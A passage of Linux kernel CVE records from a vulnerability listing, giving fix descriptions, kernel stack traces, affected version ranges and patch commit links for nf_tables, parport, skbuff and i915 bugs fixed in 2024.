[ 6170.287895] RSP: 0018:ffff888134b8fd08 EFLAGS: 00010202
[ 6170.287904] RAX: 0000000000000001 RBX: ffff888125bffb28 RCX: dffffc0000000000
[ 6170.287912] RDX: 0000000000000003 RSI: ffffffffa20298ab RDI: ffff88811ebe4750
[ 6170.287919] RBP: ffff88811ebe4700 R08: ffff88838e812650 R09: fffffbfff0623a55
[ 6170.287926] R10: ffffffff8311d2af R11: 0000000000000001 R12: ffff888125bffb10
[ 6170.287933] R13: ffff888125bffb10 R14: dead000000000122 R15: dead000000000100
[ 6170.287940] FS: 0000000000000000(0000) GS:ffff888390b00000(0000) knlGS:0000000000000000
[ 6170.287948] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 6170.287955] CR2: 00007fd31fc00710 CR3: 0000000133f60004 CR4: 00000000001706f0
[ 6170.287962] Call Trace:
[ 6170.287967] <TASK>
[ 6170.287973] ? __warn+0x9f/0x1a0
[ 6170.287986] ? nf_tables_chain_destroy+0x1f7/0x220 [nf_tables]
[ 6170.288092] ? report_bug+0x1b1/0x1e0
[ 6170.287986] ? nf_tables_chain_destroy+0x1f7/0x220 [nf_tables]
[ 6170.288092] ? report_bug+0x1b1/0x1e0
[ 6170.288104] ? handle_bug+0x3c/0x70
[ 6170.288112] ? exc_invalid_op+0x17/0x40
[ 6170.288120] ? asm_exc_invalid_op+0x1a/0x20
[ 6170.288132] ? nf_tables_chain_destroy+0x2b/0x220 [nf_tables]
[ 6170.288243] ? nf_tables_chain_destroy+0x1f7/0x220 [nf_tables]
[ 6170.288366] ? nf_tables_chain_destroy+0x2b/0x220 [nf_tables]
[ 6170.288483] nf_tables_trans_destroy_work+0x588/0x590 [nf_tables]
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27011",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-14T18:56:26.241509Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-14T18:56:33.545Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.885Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/49d0e656d19dfb2d4d7c230e4a720d37b3decff6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/86a1471d7cde792941109b93b558b5dc078b9ee9"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a1bd2a38a1c6388fc8556816dc203c3e9dc52237",
"status": "affected",
"version": "591054469b3eef34bc097c30fae8ededddf8d796",
"versionType": "git"
},
{
"lessThan": "49d0e656d19dfb2d4d7c230e4a720d37b3decff6",
"status": "affected",
"version": "591054469b3eef34bc097c30fae8ededddf8d796",
"versionType": "git"
},
{
"lessThan": "86a1471d7cde792941109b93b558b5dc078b9ee9",
"status": "affected",
"version": "591054469b3eef34bc097c30fae8ededddf8d796",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.12"
},
{
"lessThan": "4.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.55",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.55",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "4.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: fix memleak in map from abort path\n\nThe delete set command does not rely on the transaction object for\nelement removal, therefore, a combination of delete element + delete set\nfrom the abort path could result in restoring twice the refcount of the\nmapping.\n\nCheck for inactive element in the next generation for the delete element\ncommand in the abort path, skip restoring state if next generation bit\nhas been already cleared. This is similar to the activate logic using\nthe set walk iterator.\n\n[ 6170.286929] ------------[ cut here ]------------\n[ 6170.286939] WARNING: CPU: 6 PID: 790302 at net/netfilter/nf_tables_api.c:2086 nf_tables_chain_destroy+0x1f7/0x220 [nf_tables]\n[ 6170.287071] Modules linked in: [...]\n[ 6170.287633] CPU: 6 PID: 790302 Comm: kworker/6:2 Not tainted 6.9.0-rc3+ #365\n[ 6170.287768] RIP: 0010:nf_tables_chain_destroy+0x1f7/0x220 [nf_tables]\n[ 6170.287886] Code: df 48 8d 7d 58 e8 69 2e 3b df 48 8b 7d 58 e8 80 1b 37 df 48 8d 7d 68 e8 57 2e 3b df 48 8b 7d 68 e8 6e 1b 37 df 48 89 ef eb c4 \u003c0f\u003e 0b 48 83 c4 08 5b 5d 41 5c 41 5d 41 5e 41 5f c3 cc cc cc cc 0f\n[ 6170.287895] RSP: 0018:ffff888134b8fd08 EFLAGS: 00010202\n[ 6170.287904] RAX: 0000000000000001 RBX: ffff888125bffb28 RCX: dffffc0000000000\n[ 6170.287912] RDX: 0000000000000003 RSI: ffffffffa20298ab RDI: ffff88811ebe4750\n[ 6170.287919] RBP: ffff88811ebe4700 R08: ffff88838e812650 R09: fffffbfff0623a55\n[ 6170.287926] R10: ffffffff8311d2af R11: 0000000000000001 R12: ffff888125bffb10\n[ 6170.287933] R13: ffff888125bffb10 R14: dead000000000122 R15: dead000000000100\n[ 6170.287940] FS: 0000000000000000(0000) GS:ffff888390b00000(0000) knlGS:0000000000000000\n[ 6170.287948] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 6170.287955] CR2: 00007fd31fc00710 CR3: 0000000133f60004 CR4: 00000000001706f0\n[ 6170.287962] Call Trace:\n[ 6170.287967] \u003cTASK\u003e\n[ 6170.287973] ? __warn+0x9f/0x1a0\n[ 6170.287986] ? nf_tables_chain_destroy+0x1f7/0x220 [nf_tables]\n[ 6170.288092] ? report_bug+0x1b1/0x1e0\n[ 6170.287986] ? nf_tables_chain_destroy+0x1f7/0x220 [nf_tables]\n[ 6170.288092] ? report_bug+0x1b1/0x1e0\n[ 6170.288104] ? handle_bug+0x3c/0x70\n[ 6170.288112] ? exc_invalid_op+0x17/0x40\n[ 6170.288120] ? asm_exc_invalid_op+0x1a/0x20\n[ 6170.288132] ? nf_tables_chain_destroy+0x2b/0x220 [nf_tables]\n[ 6170.288243] ? nf_tables_chain_destroy+0x1f7/0x220 [nf_tables]\n[ 6170.288366] ? nf_tables_chain_destroy+0x2b/0x220 [nf_tables]\n[ 6170.288483] nf_tables_trans_destroy_work+0x588/0x590 [nf_tables]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:02:07.975Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a1bd2a38a1c6388fc8556816dc203c3e9dc52237"
},
{
"url": "https://git.kernel.org/stable/c/49d0e656d19dfb2d4d7c230e4a720d37b3decff6"
},
{
"url": "https://git.kernel.org/stable/c/86a1471d7cde792941109b93b558b5dc078b9ee9"
}
],
"title": "netfilter: nf_tables: fix memleak in map from abort path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27011",
"datePublished": "2024-05-01T05:29:33.090Z",
"dateReserved": "2024-02-19T14:20:24.208Z",
"dateUpdated": "2025-05-04T09:02:07.975Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42301 (GCVE-0-2024-42301)
Vulnerability from cvelistv5
Published
2024-08-17 09:09
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
dev/parport: fix the array out-of-bounds risk
Fixed array out-of-bounds issues caused by sprintf
by replacing it with snprintf for safer data copying,
ensuring the destination buffer is not overflowed.
Below is the stack trace I encountered during the actual issue:
[ 66.575408s] [pid:5118,cpu4,QThread,4]Kernel panic - not syncing: stack-protector:
Kernel stack is corrupted in: do_hardware_base_addr+0xcc/0xd0 [parport]
[ 66.575408s] [pid:5118,cpu4,QThread,5]CPU: 4 PID: 5118 Comm:
QThread Tainted: G S W O 5.10.97-arm64-desktop #7100.57021.2
[ 66.575439s] [pid:5118,cpu4,QThread,6]TGID: 5087 Comm: EFileApp
[ 66.575439s] [pid:5118,cpu4,QThread,7]Hardware name: HUAWEI HUAWEI QingYun
PGUX-W515x-B081/SP1PANGUXM, BIOS 1.00.07 04/29/2024
[ 66.575439s] [pid:5118,cpu4,QThread,8]Call trace:
[ 66.575469s] [pid:5118,cpu4,QThread,9] dump_backtrace+0x0/0x1c0
[ 66.575469s] [pid:5118,cpu4,QThread,0] show_stack+0x14/0x20
[ 66.575469s] [pid:5118,cpu4,QThread,1] dump_stack+0xd4/0x10c
[ 66.575500s] [pid:5118,cpu4,QThread,2] panic+0x1d8/0x3bc
[ 66.575500s] [pid:5118,cpu4,QThread,3] __stack_chk_fail+0x2c/0x38
[ 66.575500s] [pid:5118,cpu4,QThread,4] do_hardware_base_addr+0xcc/0xd0 [parport]
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42301",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:10:32.108495Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:05.142Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/parport/procfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "166a0bddcc27de41fe13f861c8348e8e53e988c8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "47b3dce100778001cd76f7e9188944b5cb27a76d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a44f88f7576bc1916d8d6293f5c62fbe7cbe03e0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "c719b393374d3763e64900ee19aaed767d5a08d6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7f4da759092a1a6ce35fb085182d02de8cc4cc84",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b579ea3516c371ecf59d073772bc45dfd28c8a0e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7789a1d6792af410aa9b39a1eb237ed24fa2170a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ab11dac93d2d568d151b1918d7b84c2d02bacbd5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/parport/procfs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndev/parport: fix the array out-of-bounds risk\n\nFixed array out-of-bounds issues caused by sprintf\nby replacing it with snprintf for safer data copying,\nensuring the destination buffer is not overflowed.\n\nBelow is the stack trace I encountered during the actual issue:\n\n[ 66.575408s] [pid:5118,cpu4,QThread,4]Kernel panic - not syncing: stack-protector:\nKernel stack is corrupted in: do_hardware_base_addr+0xcc/0xd0 [parport]\n[ 66.575408s] [pid:5118,cpu4,QThread,5]CPU: 4 PID: 5118 Comm:\nQThread Tainted: G S W O 5.10.97-arm64-desktop #7100.57021.2\n[ 66.575439s] [pid:5118,cpu4,QThread,6]TGID: 5087 Comm: EFileApp\n[ 66.575439s] [pid:5118,cpu4,QThread,7]Hardware name: HUAWEI HUAWEI QingYun\nPGUX-W515x-B081/SP1PANGUXM, BIOS 1.00.07 04/29/2024\n[ 66.575439s] [pid:5118,cpu4,QThread,8]Call trace:\n[ 66.575469s] [pid:5118,cpu4,QThread,9] dump_backtrace+0x0/0x1c0\n[ 66.575469s] [pid:5118,cpu4,QThread,0] show_stack+0x14/0x20\n[ 66.575469s] [pid:5118,cpu4,QThread,1] dump_stack+0xd4/0x10c\n[ 66.575500s] [pid:5118,cpu4,QThread,2] panic+0x1d8/0x3bc\n[ 66.575500s] [pid:5118,cpu4,QThread,3] __stack_chk_fail+0x2c/0x38\n[ 66.575500s] [pid:5118,cpu4,QThread,4] do_hardware_base_addr+0xcc/0xd0 [parport]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:18.767Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/166a0bddcc27de41fe13f861c8348e8e53e988c8"
},
{
"url": "https://git.kernel.org/stable/c/47b3dce100778001cd76f7e9188944b5cb27a76d"
},
{
"url": "https://git.kernel.org/stable/c/a44f88f7576bc1916d8d6293f5c62fbe7cbe03e0"
},
{
"url": "https://git.kernel.org/stable/c/c719b393374d3763e64900ee19aaed767d5a08d6"
},
{
"url": "https://git.kernel.org/stable/c/7f4da759092a1a6ce35fb085182d02de8cc4cc84"
},
{
"url": "https://git.kernel.org/stable/c/b579ea3516c371ecf59d073772bc45dfd28c8a0e"
},
{
"url": "https://git.kernel.org/stable/c/7789a1d6792af410aa9b39a1eb237ed24fa2170a"
},
{
"url": "https://git.kernel.org/stable/c/ab11dac93d2d568d151b1918d7b84c2d02bacbd5"
}
],
"title": "dev/parport: fix the array out-of-bounds risk",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42301",
"datePublished": "2024-08-17T09:09:08.057Z",
"dateReserved": "2024-07-30T07:40:12.271Z",
"dateUpdated": "2025-05-04T09:26:18.767Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36929 (GCVE-0-2024-36929)
Vulnerability from cvelistv5
Published
2024-05-30 15:29
Modified
2025-05-04 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: core: reject skb_copy(_expand) for fraglist GSO skbs
SKB_GSO_FRAGLIST skbs must not be linearized, otherwise they become
invalid. Return NULL if such an skb is passed to skb_copy or
skb_copy_expand, in order to prevent a crash on a potential later
call to skb_gso_segment.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 3a1296a38d0cf62bffb9a03c585cbd5dbf15d596 Version: 3a1296a38d0cf62bffb9a03c585cbd5dbf15d596 Version: 3a1296a38d0cf62bffb9a03c585cbd5dbf15d596 Version: 3a1296a38d0cf62bffb9a03c585cbd5dbf15d596 Version: 3a1296a38d0cf62bffb9a03c585cbd5dbf15d596 Version: 3a1296a38d0cf62bffb9a03c585cbd5dbf15d596 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36929",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-04T15:42:14.703241Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:47:55.373Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-09-05T08:03:34.841Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/faa83a7797f06cefed86731ba4baa3b4dfdc06c1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c7af99cc21923a9650533c9d77265c8dd683a533"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/989bf6fd1e1d058e73a364dce1a0c53d33373f62"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cfe34d86ef9765c388f145039006bb79b6c81ac6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aea5e2669c2863fdd8679c40ee310b3bcaa85aec"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d091e579b864fa790dd6a0cd537a22c383126681"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240905-0010/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/core/skbuff.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "faa83a7797f06cefed86731ba4baa3b4dfdc06c1",
"status": "affected",
"version": "3a1296a38d0cf62bffb9a03c585cbd5dbf15d596",
"versionType": "git"
},
{
"lessThan": "c7af99cc21923a9650533c9d77265c8dd683a533",
"status": "affected",
"version": "3a1296a38d0cf62bffb9a03c585cbd5dbf15d596",
"versionType": "git"
},
{
"lessThan": "989bf6fd1e1d058e73a364dce1a0c53d33373f62",
"status": "affected",
"version": "3a1296a38d0cf62bffb9a03c585cbd5dbf15d596",
"versionType": "git"
},
{
"lessThan": "cfe34d86ef9765c388f145039006bb79b6c81ac6",
"status": "affected",
"version": "3a1296a38d0cf62bffb9a03c585cbd5dbf15d596",
"versionType": "git"
},
{
"lessThan": "aea5e2669c2863fdd8679c40ee310b3bcaa85aec",
"status": "affected",
"version": "3a1296a38d0cf62bffb9a03c585cbd5dbf15d596",
"versionType": "git"
},
{
"lessThan": "d091e579b864fa790dd6a0cd537a22c383126681",
"status": "affected",
"version": "3a1296a38d0cf62bffb9a03c585cbd5dbf15d596",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/core/skbuff.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: core: reject skb_copy(_expand) for fraglist GSO skbs\n\nSKB_GSO_FRAGLIST skbs must not be linearized, otherwise they become\ninvalid. Return NULL if such an skb is passed to skb_copy or\nskb_copy_expand, in order to prevent a crash on a potential later\ncall to skb_gso_segment."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:12:17.407Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/faa83a7797f06cefed86731ba4baa3b4dfdc06c1"
},
{
"url": "https://git.kernel.org/stable/c/c7af99cc21923a9650533c9d77265c8dd683a533"
},
{
"url": "https://git.kernel.org/stable/c/989bf6fd1e1d058e73a364dce1a0c53d33373f62"
},
{
"url": "https://git.kernel.org/stable/c/cfe34d86ef9765c388f145039006bb79b6c81ac6"
},
{
"url": "https://git.kernel.org/stable/c/aea5e2669c2863fdd8679c40ee310b3bcaa85aec"
},
{
"url": "https://git.kernel.org/stable/c/d091e579b864fa790dd6a0cd537a22c383126681"
}
],
"title": "net: core: reject skb_copy(_expand) for fraglist GSO skbs",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36929",
"datePublished": "2024-05-30T15:29:21.430Z",
"dateReserved": "2024-05-30T15:25:07.069Z",
"dateUpdated": "2025-05-04T09:12:17.407Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41092 (GCVE-0-2024-41092)
Vulnerability from cvelistv5
Published
2024-07-29 15:48
Modified
2025-05-04 09:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/i915/gt: Fix potential UAF by revoke of fence registers
CI has been sporadically reporting the following issue triggered by
igt@i915_selftest@live@hangcheck on ADL-P and similar machines:
<6> [414.049203] i915: Running intel_hangcheck_live_selftests/igt_reset_evict_fence
...
<6> [414.068804] i915 0000:00:02.0: [drm] GT0: GUC: submission enabled
<6> [414.068812] i915 0000:00:02.0: [drm] GT0: GUC: SLPC enabled
<3> [414.070354] Unable to pin Y-tiled fence; err:-4
<3> [414.071282] i915_vma_revoke_fence:301 GEM_BUG_ON(!i915_active_is_idle(&fence->active))
...
<4>[ 609.603992] ------------[ cut here ]------------
<2>[ 609.603995] kernel BUG at drivers/gpu/drm/i915/gt/intel_ggtt_fencing.c:301!
<4>[ 609.604003] invalid opcode: 0000 [#1] PREEMPT SMP NOPTI
<4>[ 609.604006] CPU: 0 PID: 268 Comm: kworker/u64:3 Tainted: G U W 6.9.0-CI_DRM_14785-g1ba62f8cea9c+ #1
<4>[ 609.604008] Hardware name: Intel Corporation Alder Lake Client Platform/AlderLake-P DDR4 RVP, BIOS RPLPFWI1.R00.4035.A00.2301200723 01/20/2023
<4>[ 609.604010] Workqueue: i915 __i915_gem_free_work [i915]
<4>[ 609.604149] RIP: 0010:i915_vma_revoke_fence+0x187/0x1f0 [i915]
...
<4>[ 609.604271] Call Trace:
<4>[ 609.604273] <TASK>
...
<4>[ 609.604716] __i915_vma_evict+0x2e9/0x550 [i915]
<4>[ 609.604852] __i915_vma_unbind+0x7c/0x160 [i915]
<4>[ 609.604977] force_unbind+0x24/0xa0 [i915]
<4>[ 609.605098] i915_vma_destroy+0x2f/0xa0 [i915]
<4>[ 609.605210] __i915_gem_object_pages_fini+0x51/0x2f0 [i915]
<4>[ 609.605330] __i915_gem_free_objects.isra.0+0x6a/0xc0 [i915]
<4>[ 609.605440] process_scheduled_works+0x351/0x690
...
In the past, there were similar failures reported by CI from other IGT
tests, observed on other platforms.
Before commit 63baf4f3d587 ("drm/i915/gt: Only wait for GPU activity
before unbinding a GGTT fence"), i915_vma_revoke_fence() was waiting for
idleness of vma->active via fence_update(). That commit introduced
vma->fence->active in order for the fence_update() to be able to wait
selectively on that one instead of vma->active since only idleness of
fence registers was needed. But then, another commit 0d86ee35097a
("drm/i915/gt: Make fence revocation unequivocal") replaced the call to
fence_update() in i915_vma_revoke_fence() with only fence_write(), and
also added that GEM_BUG_ON(!i915_active_is_idle(&fence->active)) in front.
